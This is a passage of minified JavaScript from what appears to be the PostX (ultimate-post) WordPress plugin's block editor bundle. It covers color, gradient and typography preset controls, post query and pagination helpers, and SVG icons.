"),onBlur:t=>{h(t.target.value.replaceAll(" ","_")+s),T("colorlabel",t.target.value,l?v:e,i)},onClick:e=>e.stopPropagation()})),!r.includes(e)&&(0,o.createElement)("div",{className:"color-delete",onClick:l=>{l.stopPropagation(),T("delete",e,"",i),t()}},n.Z.delete)))};return(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-global-color-label"},(0,o.createElement)("div",{className:"ultp-global-color-label-content"},"Color Palette"),(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)("div",{className:w?"":"active",onClick:()=>x(!1)},"Solid"),(0,o.createElement)("div",{className:w?"active":"",onClick:()=>x(!0)},"Gradient"))),w?(0,o.createElement)("div",{className:"ultp-global-color-preset"},Object.keys(d).map(((e,t)=>(0,o.createElement)(s,{key:t},"rootCSS"!=e&&(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-gradient-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:t,onClose:l})=>(0,o.createElement)(c,{placement:"top",text:e.replace("_gradient","").replaceAll("_"," ")},(0,o.createElement)("span",{className:"ultp-global-color",onClick:()=>{!["Primary_to_Secondary_to_Right_gradient","Primary_to_Secondary_to_Bottom_gradient","Secondary_to_Primary_to_Right_gradient","Secondary_to_Primary_to_Bottom_gradient"].includes(e)&&t()},style:{background:d[e]}})),renderContent:({onClose:t})=>(0,o.createElement)(s,null,(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup ultp-color-container"},(0,o.createElement)(u,{clearable:!1,__nextHasNoMargin:!0,value:"object"==typeof d[e]?_(d[e]):d[e],onChange:t=>{T(e,_(t),"","gradient")}})),C(e,t,"","gradient"))})))),(0,o.createElement)(s,null,(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-gradient-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("span",{className:"ultp-global-color-add",onClick:()=>{e();const t=String.fromCharCode(97+Math.floor(26*Math.random()));T(`Custom_${Object.keys(d).length-5}${t}_gradient`,"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)","","gradient"),k("linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)"),h(`Custom_${Object.keys(d).length-5}${t}_gradient`)}},n.Z.plus),renderContent:({onClose:e})=>(0,o.createElement)(s,null,(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup"},(0,o.createElement)(u,{className:"ultp-common-popup ultp-color-popup ultp-color-container",clearable:!1,value:f||"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)",onChange:e=>{k(_(e)),T(v,e,"","gradient")}})),C(v,e,"save","gradient"))}))):(0,o.createElement)("div",{className:"ultp-global-color-preset"},Object.keys(t).map(((e,l)=>(0,o.createElement)(s,{key:l},"rootCSS"!=e&&(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-color-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:l,onClose:a})=>(0,o.createElement)(c,{placement:"top",text:e.replace("_color","").replaceAll("_"," ")},(0,o.createElement)("span",{className:"ultp-global-color",onClick:()=>l(),style:{backgroundColor:t[e]}})),renderContent:({onClose:l})=>(0,o.createElement)("div",null,(0,o.createElement)(i.Z,{presetSetting:!0,value:t[e],onChange:t=>T(e,t,"","")}),C(e,l,"",""))})))),(0,o.createElement)(s,null,(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-color-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("span",{className:"ultp-global-color-add",onClick:()=>{e();const l=String.fromCharCode(97+Math.floor(26*Math.random()));T(`Custom_${Object.keys(t).length-9}${l}_color`,"#000","","color"),k("#000"),h(`Custom_${Object.keys(t).length-9}${l}_color`)}},n.Z.plus),renderContent:({onClose:e})=>(0,o.createElement)("div",null,(0,o.createElement)(i.Z,{presetSetting:!0,value:f||"#000",onChange:e=>{"object"==typeof e&&(e=g(e)),k(e),T(v,e,"","")}}),C(v,e,"save",""))}))))}},99558:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(60448),i=l(7928),n=l(60405),r=l(7106),s=l(87763);const{Fragment:p}=wp.element,{Dropdown:c}=wp.components,{__}=wp.i18n,u=(0,a.AJ)("multipleTypos"),d=e=>{const{presetTypos:t,setPresetTypos:l,device:d,setDevice:m,setGlobalTypo:g,enablePresetTypoCSS:y,setValue:b,setSaveNotice:v}=e,h=(e,o,a,i)=>{v(!0);let n={...t};if("delete"==e)delete n[a];else if(["size","height"].includes(e))n={...n,[a]:{...t[a],[e]:o}};else if("all"==e)u[a].forEach((e=>{o={...o,size:t[e].size},n={...n,[e]:o}}));else if("typolabel"==e){a=a.replaceAll(" ","_")+"_typo";const e={};for(const t in n)e[t==i?a:t]=n[t];n={...e}}else n={...n,[a]:o};n={...n,presetTypoCSS:g(n)},l(n)},f=(e,l,n)=>(0,o.createElement)(p,{key:n},(0,o.createElement)(c,{className:"ultp-editor-dropdown",contentClassName:"ultp-editor-typo-content ultp-editor-preset-dropdown components-dropdown__content",popoverProps:{placement:"top-start"},focusOnMount:!0,renderToggle:({onToggle:l})=>(0,o.createElement)("div",{className:"ultp-global-label ultp-field-typo",onClick:()=>l()},(e=>{const l=[...(0,a.AJ)("presetTypoKeys"),"presetTypoCSS"],i="_typo";return(0,o.createElement)("div",{className:"ultp-editor-preset-typo-lists"},(0,o.createElement)("div",{className:"typo-label-container"},(0,o.createElement)("div",{className:"typo-label-demo"},(0,o.createElement)("div",{className:"typo-demo",style:{fontFamily:t[e].family}},"Aa"),l.includes(e)?(0,o.createElement)("div",{className:"typo-label"},e.replace(i,"").replaceAll("_"," ")):(0,o.createElement)("input",{type:"text",className:"typo-label",value:e.replace(i,"").replaceAll("_"," "),onChange:t=>{h("typolabel","",t.target.value,e)},onClick:e=>e.stopPropagation()}))),(0,o.createElement)("div",{className:"ultp-editor-typo-actions"},(0,o.createElement)("div",{className:"typo-edit"},s.Z.edit),!l.includes(e)&&(0,o.createElement)("div",{className:"typo-delete",onClick:t=>{t.stopPropagation(),h("delete","",e)}},s.Z.delete)))})(e)),renderContent:({onClose:a})=>(0,o.createElement)("div",{className:"ultp-global-typos"},(0,o.createElement)(r.Z,{presetSetting:!0,presetSettingParent:"all"==l,key:n,value:t[e],label:"",device:d,setDevice:e=>{m(e)},onChange:t=>h("parent",t,e),onDeviceChange:e=>{}}),"all"==l&&(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-separator ultp-typo-separator"},(0,o.createElement)("div",null,(0,o.createElement)("span",{className:"typo_title"},"Font Size & Line Height"))),"all"==l&&u[e].map(((e,l)=>(0,o.createElement)("div",{key:l,className:"ultp-preset-typo-seperate-setiings"},(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-separator ultp-typo-separator"},(0,o.createElement)("div",{className:"typo-left"},(0,o.createElement)("span",{className:"typo_title"},e.replace("_typo","").replaceAll("_"," ")))),(0,o.createElement)("div",{key:l,className:"ultp-typo-container ultp-typ-family"},(0,o.createElement)("div",{className:"ultp-typo-section"},(0,o.createElement)(i.Z,{min:1,max:300,step:1,unit:["px","em","rem"],responsive:!0,label:"Font Size",value:t[e].size||"",device:d,setDevice:m,onChange:t=>h("size",t,e)})),(0,o.createElement)("div",{className:"ultp-typo-section"},(0,o.createElement)(i.Z,{min:1,max:300,step:1,responsive:!0,device:d,setDevice:m,unit:["px","em","rem"],label:"Line Height",value:t[e].height||"",onChange:t=>h("height",t,e)})))))))}));return(0,o.createElement)("div",{className:"ultp-editor-global-typo-container"},(0,o.createElement)(n.Z,{label:__("Override Theme Typography","ultimate-post"),value:y,onChange:e=>b("enablePresetTypoCSS",e)}),(0,o.createElement)("div",{className:"ultp-editor-global-typo-section"},Object.keys(u).map(((e,t)=>f(e,"all",t))),Object.keys(t).map(((e,t)=>![...u.Body_and_Others_typo,...u.Heading_typo,...(0,a.AJ)("presetTypoKeys"),"presetTypoCSS"].includes(e)&&f(e,"single",t)))),(0,o.createElement)("span",{className:"ultp-global-typo-add",onClick:()=>{h("",{openTypography:1,family:"Arial",type:"sans-serif",weight:100},`Custom_${Object.keys(t).length-12}${String.fromCharCode(97+Math.floor(26*Math.random()))}_typo`,"")}},(0,o.createElement)("span",{className:"typo-add"},s.Z.plus),"Add Item"))}},87025:(e,t,l)=>{"use strict";l.d(t,{CH:()=>H,DX:()=>_,Dg:()=>C,FL:()=>E,FW:()=>x,IG:()=>P,M5:()=>m,NH:()=>T,Pm:()=>v,Rt:()=>S,Ti:()=>n,Vn:()=>w,ZQ:()=>i,a2:()=>U,gT:()=>A,nn:()=>h,oA:()=>B,ob:()=>L,os:()=>I,p2:()=>p,rl:()=>k,t2:()=>r,zC:()=>M});var o=l(67294),a=l(53049);const{__}=wp.i18n,i={general:!1,query_builder:!1,heading:!1,title:!1,meta:!1,"taxonomy-/-category":!1,tax:!1,image:!1,video:!1,wrap:!1,excerpt:!1,filter:!1,pagination:!1,"read-more":!1,separator:!1,dc_field:!1,dc_group:!1,arrow:!1,dot:!1},n={postsList:[],loading:!0,error:!1,section:{...i,general:!0},toolbarSettings:"",selectedDC:""},r=(e,t,l)=>{t.error&&l({...t,error:!1}),t.loading||l({...t,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(e)}).then((e=>{l({...t,postsList:e,loading:!1})})).catch((e=>{l({...t,loading:!1,error:!0})}))},s="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",p=(0,o.createElement)(o.Fragment,null,"AJAX Pagination must be used with Advanced Filter.",(0,o.createElement)("br",null),(0,o.createElement)("strong",null,"Remove Advance Filter first to use non-AJAX pagination")),c=["pagiAlign","pagiArrowSize","pagiBgColor","pagiBorder","pagiColor","pagiHoverBorder","pagiHoverColor","pagiHoverRadius","pagiHoverShadow","pagiHoverbg","pagiMargin","pagiPadding","pagiRadius","pagiShadow","pagiTypo","paginationNav","paginationText","paginationType"],u=[{value:"popular_post_1_day_view",label:__("Trending Today","ultimate-post"),pro:!0,link:s},{value:"popular_post_7_days_view",label:__("This Week’s Popular Posts","ultimate-post"),pro:!0,link:s},{value:"popular_post_30_days_view",label:__("Top Posts of the Month","ultimate-post"),pro:!0,link:s},{value:"popular_post_all_times_view",label:__("All-Time Favorites","ultimate-post"),pro:!0,link:s},{value:"random_post",label:__("Random Posts","ultimate-post"),pro:!0,link:s},{value:"random_post_7_days",label:__("Random Posts (7 Days)","ultimate-post"),pro:!0,link:s},{value:"random_post_30_days",label:__("Random Posts (30 Days)","ultimate-post"),pro:!0,link:s},{value:"latest_post_published",label:__("Latest Posts - Published Date","ultimate-post"),pro:!0,link:s},{value:"latest_post_modified",label:__("Latest Posts - Last Modified Date","ultimate-post"),pro:!0,link:s},{value:"oldest_post_published",label:__("Oldest Posts - Published Date","ultimate-post"),pro:!0,link:s},{value:"oldest_post_modified",label:__("Oldest Posts - Last Modified Date","ultimate-post"),pro:!0,link:s},{value:"alphabet_asc",label:__("Alphabetical ASC","ultimate-post"),pro:!0,link:s},{value:"alphabet_desc",label:__("Alphabetical DESC","ultimate-post"),pro:!0,link:s},{value:"sticky_posts",label:__("Sticky Post","ultimate-post"),pro:!0,link:s},{value:"most_comment",label:__("Most Comments","ultimate-post"),pro:!0,link:s},{value:"most_comment_1_day",label:__("Most Comments (1 Day)","ultimate-post"),pro:!0,link:s},{value:"most_comment_7_days",label:__("Most Comments (7 Days)","ultimate-post"),pro:!0,link:s},{value:"most_comment_30_days",label:__("Most Comments (30 Days)","ultimate-post"),pro:!0,link:s}],d=["post-grid","post-list","post-module"],m=e=>{if(e.startsWith("ultimate-post/")){const[,t]=e.split("/");return d.some((e=>t.startsWith(e)))}return!1},g=e=>{const{getBlocks:t,getBlockRootClientId:l}=wp.data.select("core/block-editor"),o=l(e);if(e){const e=t(o).filter((e=>"ultimate-post/advanced-filter"===e.name));return e[0]?e[0]:null}return null},y=e=>{const{getBlocks:t,getBlockRootClientId:l}=wp.data.select("core/block-editor"),o=l(e);if(e){const e=t(o).filter((e=>"ultimate-post/post-pagination"===e.name));return e[0]?e[0]:null}return null},b=(e,t)=>{const{getBlocks:l}=wp.data.select("core/block-editor");return l(e).filter((e=>m(e.name)))},v=(e,t)=>{const{getBlock:l,getBlockRootClientId:o}=wp.data.select("core/block-editor"),{selectBlock:a,replaceBlock:i}=wp.data.dispatch("core/block-editor"),{createBlock:n,cloneBlock:r}=wp.blocks;if(!g(e)){const s=l(t||o(e)),p=r(l(e)),c=n("ultimate-post/advanced-filter",{});i(e,s&&"ultimate-post/post-grid-parent"===s.name?[c,p]:n("ultimate-post/post-grid-parent",{},[c,p])).then((()=>{a(c.clientId)}))}},h=e=>{const{removeBlock:t,selectBlock:l}=wp.data.dispatch("core/block-editor"),o=g(e);o&&t(o.clientId).then((()=>{l(e)}))},f=e=>{if(!e)return;const t={};return c.forEach((l=>{void 0!==e.attributes[l]&&(t[l]=e.attributes[l])})),t};function k(e,t){const{getBlock:l,getBlockRootClientId:o}=wp.data.select("core/block-editor"),{replaceBlock:a}=wp.data.dispatch("core/block-editor"),{createBlock:i,cloneBlock:n}=wp.blocks;if(!y(e)){const r=l(t||o(e)),s=l(e),p=n(s),c=i("ultimate-post/post-pagination",f(s));r&&"ultimate-post/post-grid-parent"===r.name?a(e,[p,c]).then((()=>{document.querySelector('[data-block="'+c.clientId+'"]')?.scrollIntoView({behavior:"smooth"})})):a(e,i("ultimate-post/post-grid-parent",{},[p,c])).then((()=>{document.querySelector('[data-block="'+c.clientId+'"]')?.scrollIntoView({behavior:"smooth"})}))}}function w(e){const{removeBlock:t,selectBlock:l}=wp.data.dispatch("core/block-editor"),o=y(e);o&&t(o.clientId).then((()=>{l(e)}))}function x(e,t,l={}){const o=function(e,t={}){const{useEntityRecords:l}=wp.coreData,{queryOrder:o}=t;switch(e){case"tags":return l("taxonomy","post_tag",{per_page:-1});case"category":return l("taxonomy","category",{per_page:-1});case"author":return l("root","user",{per_page:-1});case"order":return{hasResolved:!0,records:o&&"desc"!==o?[{id:"asc",name:"ASC"},{id:"desc",name:"DESC"}]:[{id:"desc",name:"DESC"},{id:"asc",name:"ASC"}]};case"order_by":return{hasResolved:!0,records:[{id:"date",name:"Created Date"},{id:"modified",name:"Date Modified"},{id:"title",name:"Title"},{id:"menu_order",name:"Menu Order"},{id:"rand",name:"Random"},{id:"comment_count",name:"Number of Comments"}]};case"adv_sort":return{hasResolved:!0,records:u.map((e=>({id:e.value,name:e.label})))};default:return null}}(e,l),a=function(e,t){const l=new Map;return["order","order_by"].includes(e)||l.set("_all",{label:t}),l}(e,t);return null===o?["none",a]:o.hasResolved?o.hasResolved&&!o.records?["none",a]:o.hasResolved&&"ERROR"===o.status?["error",a]:("author"===e?o.records.forEach((e=>{const t=["administrator","editor","author","contributor"];if(e.roles&&e.roles.some((e=>t.includes(e)))){const t=e.name;a.set(String(e.id),{label:t})}})):"custom_tax"===e?o.records.forEach((e=>{a.set(String(e.slug),{label:e.labels.name})})):o.records.forEach((e=>{a.set(String(e.id),{label:e.name})})),["success",a]):["loading",a]}function T(e){return 0===e.length?[]:e.filter((e=>e.attributes.selectedLabel)).map((e=>({[e.clientId]:e.attributes.selectedLabel})))}function _(e){return e.toLowerCase().replace(/\b(\w)/g,(e=>e.toUpperCase()))}function C(e){const{updateBlockAttributes:t}=wp.data.dispatch("core/block-editor");t(e,{selectedValue:"_all",selectedLabel:""})}const E=e=>{let t=[];return e.forEach((e=>{t.push(e),e.innerBlocks&&e.innerBlocks.length>0&&(t=t.concat(E(e.innerBlocks)))})),t};function S(e){function t(e){const t=document.getElementById("ultp-sidebar-"+e);t?(t.classList.add("ultp-sidebar-highlight"),t.style.scrollMarginTop="51px",t.scrollIntoView({behavior:"smooth"}),setTimeout((function(){t?.classList.remove("ultp-sidebar-highlight")}),2e3)):console.warn("section not found: "+e)}e=e.replace(/ /g,"-").toLowerCase(),setTimeout((()=>{try{t(e)}catch{setTimeout((()=>t(e)),1500)}}),500)}function P(e,t){const{updateBlockAttributes:l}=wp.data.dispatch("core/block-editor");b(e).forEach((e=>{l(e.clientId,t)}))}function L(e){localStorage.setItem("ultp_selected_settings_section",e)}function I(e){localStorage.setItem("ultp_selected_toolbar",e)}function B(){"true"!==localStorage.getItem("ultp_settings_reset_disabled")&&(localStorage.removeItem("ultp_selected_settings_section"),localStorage.removeItem("ultp_selected_toolbar"),localStorage.removeItem("ultp_settings_save_state"),localStorage.removeItem("ultp_prev_sel_block"),localStorage.removeItem("ultp_settings_active_tab"))}function U(e,t){localStorage.setItem("ultp_settings_active_tab",e+"###"+t)}function M(e){if("true"===localStorage.getItem("ultp_settings_save_state")){const t=localStorage.getItem("ultp_settings_active_tab");if(t){const[l,o]=t.split("###");return l===e?o:void 0}}}function A(e,t){if("true"===localStorage.getItem("ultp_settings_save_state")){const l=localStorage.getItem("ultp_selected_settings_section");l&&e(l);const o=localStorage.getItem("ultp_selected_toolbar");o&&t(o),B()}}function H(e,t,l,o){let a=null;e&&e["post-grid-parent/postBlockClientId"];const i=g(l.clientId);t&&null===i&&(l.setAttributes({advFilterEnable:!1}),h(l.clientId));const n=y(l.clientId);o&&null===n&&(l.setAttributes({advPaginationEnable:!1}),w(l.clientId))}},54324:(e,t,l)=>{"use strict";l.d(t,{S:()=>r});var o=l(53049);const{useEffect:a}=wp.element,{getBlockAttributes:i,getBlockRootClientId:n}=wp.data.select("core/block-editor"),r=(e={})=>{const{blockId:t,clientId:l,currentPostId:r,setAttributes:s,changePostId:p,checkRef:c}=e;a((()=>{const e=l.substr(0,6),a=0!=c?i(n(l)):"";t?t&&t!=e&&(a?.hasOwnProperty("ref")||s({blockId:e})):s({blockId:e}),0!=p&&(0,o.qi)(s,a,r,l)}),[l])}},2376:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});const{useEffect:o,useState:a,useRef:i}=wp.element;function n(){const e=i(),[t,l]=a(!1);return o((()=>{const t=t=>{!e.current||e.current.contains(t.target)||((e,t)=>{let l=t.parentNode;for(;null!==l;){if(l===e)return!0;l=l.parentNode}return!1})(e.current,t.target)||l(!1)};return document.addEventListener("click",t,!0),()=>{document.removeEventListener("click",t,!0)}}),[]),{elementRef:e,isSelected:t,setIsSelected:l}}},59902:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});const{useSelect:o,useDispatch:a}=wp.data,{useEffect:i}=wp.element,n={Desktop:"lg",Tablet:"sm",Mobile:"xs",lg:"Desktop",sm:"Tablet",xs:"Mobile"},r=wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post";function s(){if(document.querySelector(".widgets-php")||document.querySelector("body.wp-customizer"))return[localStorage.getItem("ultpDevice")||"lg",e=>{if(localStorage.getItem("ultpDevice")!=e){localStorage.setItem("ultpDevice",e);const t=wp.data?.select("core/block-editor")?.getSelectedBlock();wp.data?.dispatch("core/block-editor")?.clearSelectedBlock(),setTimeout((()=>{t?.clientId&&wp.data.dispatch("core/block-editor")?.selectBlock(t.clientId)}),100)}}];let e;const{clearSelectedBlock:t,selectBlock:l}=a("core/block-editor"),i=o((e=>e("core/block-editor").getSelectedBlock),[]),{setPreviewDevice:s}=a("core/editor");e=s;const{__experimentalSetPreviewDeviceType:p}=a(r);e||(e=p);const c=o((e=>{let t;const{getDeviceType:l}=e("core/editor");if(t=l,!t){const{__experimentalGetPreviewDeviceType:l}=e(r);t=l}return n[t()]}),[]);return[c,o=>{const a=i();(["Desktop","lg"].includes(o)||["Desktop","lg"].includes(c))&&c!==o&&a?.clientId&&!wp.data.select("core/edit-site")?(localStorage.setItem("ultp_settings_save_state","true"),localStorage.setItem("ultp_settings_reset_disabled","true"),t(),e(n[o]),localStorage.setItem("ultpDevice",o.length<3?c:n[o]),setTimeout((()=>{l(a.clientId),setTimeout((()=>{localStorage.removeItem("ultp_settings_reset_disabled")}),500)}),500)):e(n[o])}]}},88640:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294);const{useState:a,useRef:i,useEffect:n}=wp.element;function r({onClick:e,hideStyleButton:t}){const l=i(null),a=e=>{l.current&&!l.current.contains(e.target)&&t()};return n((()=>(document.addEventListener("click",a,!0),()=>{document.removeEventListener("click",a,!0)})),[]),(0,o.createElement)("span",{ref:l,onClick:e,className:"ultp-ux-style-btn dashicons dashicons-admin-customizer"})}function s(e){const[t,l]=a(!1);return{showStyleButton:()=>{l(!0)},StyleButton:t?(0,o.createElement)(r,{hideStyleButton:()=>{l(!1)},onClick:e}):null}}},87763:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294);const a={};a.left=(0,o.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M4 19.8h8.9v-1.5H4v1.5zm8.9-15.6H4v1.5h8.9V4.2zm-8.9 7v1.5h16v-1.5H4z"})),a.center=(0,o.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.4 4.2H7.6v1.5h8.9V4.2zM4 11.2v1.5h16v-1.5H4zm3.6 8.6h8.9v-1.5H7.6v1.5z"})),a.right=(0,o.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.1 19.8H20v-1.5h-8.9v1.5zm0-15.6v1.5H20V4.2h-8.9zM4 12.8h16v-1.5H4v1.5z"})),a.spacing=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:24,height:24,fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"#1E1E1E",strokeWidth:"1.5",d:"m10 8-3.3 3.3a1 1 0 0 0 0 1.4L10 16m4-8 3.3 3.3a1 1 0 0 1 0 1.4L14 16m-7.59-4H17.6M20 4v16M4 4v16"})),a.updateLink=(0,o.createElement)("svg",{style:{height:"20px",width:"20px"},xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M12.95 2.93a5.75 5.75 0 0 1 8.13 8.13v.01l-3 3a5.75 5.75 0 0 1-8.68-.62.75.75 0 0 1 1.2-.9 4.25 4.25 0 0 0 6.41.46l3-3a4.25 4.25 0 0 0-6.02-6l-1.71 1.7a.75.75 0 1 1-1.06-1.06l1.73-1.72Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M7.99 8.6a5.75 5.75 0 0 1 6.61 1.95.75.75 0 1 1-1.2.9 4.25 4.25 0 0 0-6.41-.46l-3 3a4.25 4.25 0 0 0 6.01 6l1.71-1.7a.75.75 0 0 1 1.06 1.06l-1.72 1.72a5.75 5.75 0 0 1-8.13-8.13l.01-.01 3-3a5.75 5.75 0 0 1 2.06-1.32Z",clipRule:"evenodd"})),a.addSubmenu=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"16",height:"16",fill:"none",viewBox:"0 0 16 16"},(0,o.createElement)("g",{fill:"#070707",fillRule:"evenodd",clipPath:"url(#a)",clipRule:"evenodd"},(0,o.createElement)("path",{d:"M.17 2C.17.99.99.17 2 .17h12c1.01 0 1.83.82 1.83 1.83v1.33c0 1.02-.82 1.84-1.83 1.84H2A1.83 1.83 0 0 1 .17 3.33V2ZM2 1.17a.83.83 0 0 0-.83.83v1.33c0 .46.37.84.83.84h12c.46 0 .83-.38.83-.84V2a.83.83 0 0 0-.83-.83H2ZM5.5 8c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83v.67c0 1-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 8.67V8Zm1.83-.83A.83.83 0 0 0 6.5 8v.67c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83V8a.83.83 0 0 0-.83-.83H7.33ZM5.5 13.33c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83V14c0 1.01-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 14v-.67Zm1.83-.83a.83.83 0 0 0-.83.83V14c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83v-.67a.83.83 0 0 0-.83-.83H7.33Z"}),(0,o.createElement)("path",{d:"M2.17 13V4.67h1V13c0 .1.07.17.16.17H6.5v1H3.33c-.64 0-1.16-.53-1.16-1.17Z"}),(0,o.createElement)("path",{d:"M2.17 7.83H6.5v1H2.17v-1Z"})),(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:"a"},(0,o.createElement)("path",{fill:"#fff",d:"M0 0h16v16H0z"})))),a.textTab=(0,o.createElement)("span",{className:"ultp-tab-button"},(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 18V6C4 4.89543 4.89543 4 6 4H14.8639C15.3943 4 15.903 4.21071 16.2781 4.58579L19.4142 7.72191C19.7893 8.09698 20 8.60569 20 9.13612V18C20 19.1046 19.1046 20 18 20H6C4.89543 20 4 19.1046 4 18Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M8 15H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M8 12H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M8 9H14",stroke:"#1E1E1E",strokeWidth:"1.5"})),(0,o.createElement)("span",null,"Text")),a.style=(0,o.createElement)("span",{className:"ultp-tab-button"},(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),(0,o.createElement)("span",null,"Style")),a.settings3=(0,o.createElement)("span",{className:"ultp-tab-button"},(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.0733 7.98829L19.5027 6.9982C19.02 6.16044 17.9503 5.87144 17.1114 6.35213C16.7121 6.58737 16.2356 6.65411 15.787 6.53764C15.3384 6.42116 14.9546 6.13103 14.7201 5.73123C14.5693 5.47711 14.4882 5.18767 14.4852 4.89218C14.4988 4.41843 14.3201 3.95934 13.9897 3.61951C13.6593 3.27967 13.2055 3.08802 12.7316 3.08821H11.5821C11.1177 3.08821 10.6725 3.27323 10.345 3.60234C10.0175 3.93145 9.83459 4.37752 9.83682 4.84183C9.82306 5.80049 9.04195 6.57039 8.08319 6.57029C7.7877 6.56722 7.49826 6.48617 7.24414 6.33535C6.40523 5.85465 5.33553 6.14366 4.85284 6.98142L4.24033 7.98829C3.75822 8.825 4.04329 9.89403 4.87801 10.3796C5.42059 10.6928 5.75483 11.2718 5.75483 11.8983C5.75483 12.5248 5.42059 13.1037 4.87801 13.417C4.04435 13.8993 3.75897 14.9657 4.24033 15.7999L4.81927 16.7984C5.04543 17.2064 5.42489 17.5076 5.87369 17.6351C6.32248 17.7627 6.8036 17.7061 7.21058 17.478C7.61067 17.2445 8.08743 17.1806 8.5349 17.3003C8.98238 17.4201 9.36347 17.7136 9.59349 18.1157C9.74431 18.3698 9.82536 18.6592 9.82843 18.9547C9.82843 19.9232 10.6136 20.7083 11.5821 20.7083H12.7316C13.6968 20.7083 14.4806 19.9283 14.4852 18.9631C14.4829 18.4973 14.667 18.05 14.9963 17.7206C15.3257 17.3913 15.773 17.2073 16.2388 17.2095C16.5336 17.2174 16.8218 17.2981 17.0779 17.4444C17.9146 17.9265 18.9836 17.6415 19.4692 16.8067L20.0733 15.7999C20.3071 15.3985 20.3713 14.9205 20.2516 14.4717C20.1319 14.0228 19.8382 13.6402 19.4356 13.4086C19.033 13.1769 18.7393 12.7943 18.6196 12.3455C18.4999 11.8967 18.5641 11.4186 18.7979 11.0173C18.95 10.7518 19.1701 10.5317 19.4356 10.3796C20.2653 